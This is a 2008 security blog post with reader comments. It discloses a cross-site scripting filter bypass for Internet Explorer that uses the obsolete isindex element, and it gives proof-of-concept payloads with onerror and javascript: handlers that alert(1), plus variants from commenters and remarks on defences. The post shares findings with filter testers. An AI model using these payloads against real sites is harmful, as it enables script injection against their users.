New XSS vector
Tuesday, 26 August 2008
Yes a XSS post again. I’m sorry 🙂
I’ve been having fun testing some really good filters (some of the best in the business IMO). I found a vector that isn’t on rsnake’s cheat sheet. Check it out:-
Only works on IE
<isindex type=image src=1 onerror=alert(1)>
Because IE treats the isindex element (a very old html element) as a input tag you can specify the same attributes and execute javascript.
Update…
Found another variation which is pretty cool:-
<isindex action=javascript:alert(1) type=image>
No. 1 — August 26th, 2008 at 9:16 pm
You can remove the value of src attribute:
<isindex type=image onerror=alert(1) src=>
(only tested on IE6)
Did you ask to rsnake to add this vector ?
No. 2 — August 26th, 2008 at 9:25 pm
Also works in IE8
I’ll email him
No. 3 — August 26th, 2008 at 9:54 pm
Emailed rsnake but they won’t be added to the cheat sheet because there is no new event handler and javascript: is already mentioned
No. 4 — August 27th, 2008 at 5:17 am
hi Gareth Heyes
good job
it work in ie6/7/8
No. 5 — August 27th, 2008 at 10:56 pm
If only everyone had the power of
ESAPI.encoder().encodeForHTMLAttribute(String userData);
Great find, good job!
No. 6 — August 28th, 2008 at 10:48 am
@jim
Hey jim thanks, why don’t you put a online demo of ESAPI like Mario’s smoketest? Then we’ll see how good it is 🙂
No. 7 — August 29th, 2008 at 7:51 am
Hi,
I have an idea, for protecting websites against XSS attacks. Why not ban all the tags, and allow only predefined ones with ‘special’ care. Like, allow img only with src that starts with a http://, or allow a href but only if http https is found.
No. 8 — November 10th, 2008 at 11:53 am
Also works in IE8. thx